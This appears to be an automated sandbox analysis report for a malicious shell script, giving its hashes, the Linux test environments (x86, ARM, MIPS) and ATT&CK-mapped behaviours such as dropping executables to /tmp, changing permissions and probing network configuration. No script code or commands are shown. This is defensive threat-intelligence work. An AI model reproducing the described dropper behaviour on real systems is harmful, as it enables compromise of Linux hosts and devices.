Analysis
-
max time kernel
17s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97